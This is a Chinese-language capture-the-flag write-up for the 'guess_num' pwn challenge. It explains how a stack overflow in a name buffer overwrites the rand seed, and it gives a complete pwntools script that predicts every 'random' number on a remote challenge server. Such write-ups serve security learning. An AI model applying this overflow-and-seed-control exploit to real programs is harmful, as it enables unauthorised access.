攻防世界 guess_num wp

0x01寻找漏洞

checksec
kk@ubuntu:~/Desktop/black/GFSJ/guess_num$ checksec guess_num
[*] '/home/kk/Desktop/black/GFSJ/guess_num/guess_num'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
ida分析

箭头所指的地方存在栈溢出,进入sub_C3E函数,发现条件成立即可找到flag


cat flag

0x02思路分析

进入v7

-0000000000000030 var_30          db ?
-000000000000002F                 db ? ; undefined
-000000000000002E                 db ? ; undefined
-000000000000002D                 db ? ; undefined
-000000000000002C                 db ? ; undefined
-000000000000002B                 db ? ; undefined
-000000000000002A                 db ? ; undefined
-0000000000000029                 db ? ; undefined
-0000000000000028                 db ? ; undefined
-0000000000000027                 db ? ; undefined
-0000000000000026                 db ? ; undefined
-0000000000000025                 db ? ; undefined
-0000000000000024                 db ? ; undefined
-0000000000000023                 db ? ; undefined
-0000000000000022                 db ? ; undefined
-0000000000000021                 db ? ; undefined
-0000000000000020                 db ? ; undefined
-000000000000001F                 db ? ; undefined
-000000000000001E                 db ? ; undefined
-000000000000001D                 db ? ; undefined
-000000000000001C                 db ? ; undefined
-000000000000001B                 db ? ; undefined
-000000000000001A                 db ? ; undefined
-0000000000000019                 db ? ; undefined
-0000000000000018                 db ? ; undefined
-0000000000000017                 db ? ; undefined
-0000000000000016                 db ? ; undefined
-0000000000000015                 db ? ; undefined
-0000000000000014                 db ? ; undefined
-0000000000000013                 db ? ; undefined
-0000000000000012                 db ? ; undefined
-0000000000000011                 db ? ; undefined
-0000000000000010 seed            dd 2 dup(?)

发现var_30在栈中占0x20,可以覆盖到seed
如果使输入的guessnumber,即v4等于随机数v6,即可cat flag。

0x03攻击

关于rand和srand

随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。在调用rand()函数时,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。
对于该题目,我们将随机种子设置为0或1都可,参考文件中的循环来写脚本。

关于ctype库与dll

我们使用python标准库中自带的ctypes模块进行python和c的混合编程

libc共享库

可以使用ldd查找

kk@ubuntu:~/Desktop/black/GFSJ/guess_num$ ldd guess_num 
    linux-vdso.so.1 =>  (0x00007ffd3f5a0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1e6c0b0000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f1e6c67d000)

也可以在脚本中通过elf文件查找

elf = ELF('./guess_num')
libc = elf.libc
exp如下
#!usr/bin/python
#coding=utf-8
from pwn import *
from ctypes import *

io = remote('111.198.29.45', 45742)
# io = process('./guess_num')

#elf = ELF('./guess_num')
#libc = elf.libc

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
io.recvuntil('your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)

io.interactive()

推荐阅读更多精彩内容